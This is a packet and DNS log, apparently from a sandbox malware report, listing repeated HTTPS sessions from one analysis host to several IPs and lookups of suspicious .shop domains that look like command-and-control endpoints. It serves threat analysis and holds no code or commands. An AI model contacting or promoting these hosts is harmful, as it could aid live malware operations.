Jan 14, 2025 17:01:59.130613089 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130640984 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130712986 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130727053 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130762100 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130769014 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130806923 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130918980 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130934000 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.130986929 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.130996943 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131006002 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.131027937 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.131113052 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131128073 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131151915 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.131159067 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131179094 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.131206036 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.131287098 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131302118 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131340027 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.131345034 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.131375074 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.138026953 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.174782038 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.174799919 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.174927950 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.174937963 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.174947977 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.174971104 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216094017 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216113091 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216181040 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216187954 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216228962 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216248035 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216263056 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216289043 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216295958 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216305017 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216321945 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216334105 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216341972 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216443062 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216461897 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216487885 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216495991 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216519117 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216697931 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216712952 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.216772079 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.216780901 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217117071 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217134953 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217175007 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.217179060 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217195034 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217206955 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217219114 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.217261076 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.217267036 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217370987 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217390060 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217417955 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.217426062 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.217452049 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.217669010 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.261199951 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.261223078 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.261301994 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.261313915 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.261363029 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302261114 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302282095 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302385092 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302397966 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302427053 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302690029 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302706003 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302735090 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302747965 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302753925 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302769899 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302789927 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302794933 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302808046 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302825928 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302840948 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.302848101 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.302862883 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303050041 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303064108 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303098917 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303103924 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303128004 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303481102 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303500891 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303539038 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303546906 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303560972 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303776026 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303791046 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303823948 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303832054 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303839922 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303852081 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303886890 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303889990 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303900957 CET	443	49702	172.67.215.98	192.168.2.7
Jan 14, 2025 17:01:59.303921938 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.303946972 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.422867060 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.423075914 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:01:59.435343981 CET	49702	443	192.168.2.7	172.67.215.98
Jan 14, 2025 17:02:23.041587114 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.041621923 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:23.041687965 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.043967009 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.043982029 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:23.529685974 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:23.529764891 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.532932997 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.532942057 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:23.533219099 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:23.573327065 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.591664076 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.591664076 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:23.591768026 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.021856070 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.021945000 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.022072077 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.023701906 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.023701906 CET	49830	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.023720026 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.023729086 CET	443	49830	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.034449100 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.034512997 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.034759045 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.035339117 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.035360098 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.529194117 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.529253960 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.531080961 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.531089067 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.531342030 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:24.532732010 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.532732010 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:24.532800913 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.014913082 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015060902 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015172005 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015285969 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.015299082 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015446901 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015494108 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.015501022 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015629053 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015672922 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.015683889 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015784025 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.015851974 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.015860081 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.019414902 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.019479990 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.019490004 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.019781113 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.102772951 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103210926 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103298903 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103398085 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103414059 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.103434086 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103477955 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.103491068 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103537083 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.103543997 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103646994 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.103833914 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.136853933 CET	49836	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.136874914 CET	443	49836	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.551626921 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.551662922 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:25.551769972 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.552304029 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:25.552319050 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.021353006 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.021476984 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.022799969 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.022810936 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.023052931 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.025384903 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.025497913 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.025532961 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.874072075 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.874164104 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.874296904 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.874418020 CET	49847	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.874425888 CET	443	49847	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.893942118 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.893970966 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:26.894066095 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.894388914 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:26.894407988 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.356312990 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.356419086 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.357609987 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.357615948 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.357861042 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.359110117 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.359266996 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.359302044 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.359349012 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.359355927 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.860244989 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.860323906 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:27.860534906 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.862586021 CET	49856	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:27.862612009 CET	443	49856	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.257976055 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.257986069 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.258049011 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.259367943 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.259376049 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.716543913 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.716604948 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.718871117 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.718878984 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.719119072 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.720413923 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.720551968 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.720578909 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:28.720630884 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:28.720635891 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:29.221658945 CET	59953	53	192.168.2.7	162.159.36.2
Jan 14, 2025 17:02:29.226486921 CET	53	59953	162.159.36.2	192.168.2.7
Jan 14, 2025 17:02:29.226596117 CET	59953	53	192.168.2.7	162.159.36.2
Jan 14, 2025 17:02:29.231364012 CET	53	59953	162.159.36.2	192.168.2.7
Jan 14, 2025 17:02:29.336909056 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:29.337152004 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:29.337258101 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:29.337507963 CET	49865	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:29.337517977 CET	443	49865	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:29.599726915 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:29.599781036 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:29.599878073 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:29.600186110 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:29.600203037 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:29.675070047 CET	59953	53	192.168.2.7	162.159.36.2
Jan 14, 2025 17:02:29.680022955 CET	53	59953	162.159.36.2	192.168.2.7
Jan 14, 2025 17:02:29.680483103 CET	59953	53	192.168.2.7	162.159.36.2
Jan 14, 2025 17:02:30.072681904 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.072787046 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.074184895 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.074196100 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.074445963 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.075716972 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.075808048 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.075814962 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.531702042 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.531943083 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.532062054 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.532174110 CET	59956	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.532185078 CET	443	59956	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.598130941 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.598140001 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:30.598278999 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.598506927 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:30.598515987 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.192336082 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.192543983 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.195214987 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.195226908 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.195488930 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.197025061 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.197084904 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.197093964 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.737238884 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.737350941 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.737453938 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.737617016 CET	59965	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.737632036 CET	443	59965	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.742290974 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.742332935 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:31.742403984 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.742805004 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:31.742826939 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.205785036 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.205879927 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.210388899 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.210393906 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.210678101 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.212984085 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.213001013 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.213067055 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.856229067 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.857388973 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.857470036 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.857716084 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.857721090 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.857731104 CET	59975	443	192.168.2.7	104.21.67.165
Jan 14, 2025 17:02:32.857734919 CET	443	59975	104.21.67.165	192.168.2.7
Jan 14, 2025 17:02:32.968477964 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:32.968502045 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:32.968585014 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:32.968970060 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:32.968981981 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:33.989705086 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:33.989980936 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:33.991489887 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:33.991502047 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:33.991806984 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:33.993104935 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:34.039340973 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:34.267647028 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:34.267693043 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:34.267806053 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:34.277795076 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:34.277810097 CET	443	59984	185.161.251.21	192.168.2.7
Jan 14, 2025 17:02:34.277844906 CET	59984	443	192.168.2.7	185.161.251.21
Jan 14, 2025 17:02:34.277852058 CET	443	59984	185.161.251.21	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 17:01:57.444178104 CET	63572	53	192.168.2.7	1.1.1.1
Jan 14, 2025 17:01:57.461729050 CET	53	63572	1.1.1.1	192.168.2.7
Jan 14, 2025 17:02:23.019697905 CET	50063	53	192.168.2.7	1.1.1.1
Jan 14, 2025 17:02:23.034348965 CET	53	50063	1.1.1.1	192.168.2.7
Jan 14, 2025 17:02:29.221124887 CET	53	59528	162.159.36.2	192.168.2.7
Jan 14, 2025 17:02:29.698234081 CET	56597	53	192.168.2.7	1.1.1.1
Jan 14, 2025 17:02:29.707066059 CET	53	56597	1.1.1.1	192.168.2.7
Jan 14, 2025 17:02:32.862157106 CET	53633	53	192.168.2.7	1.1.1.1
Jan 14, 2025 17:02:32.967688084 CET	53	53633	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 17:01:57.444178104 CET	192.168.2.7	1.1.1.1	0x289d	Standard query (0)	u1.grapplereturnunstamped.shop	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:02:23.019697905 CET	192.168.2.7	1.1.1.1	0xf3e9	Standard query (0)	burnressert.shop	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:02:29.698234081 CET	192.168.2.7	1.1.1.1	0xd5fe	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 14, 2025 17:02:32.862157106 CET	192.168.2.7	1.1.1.1	0xd849	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

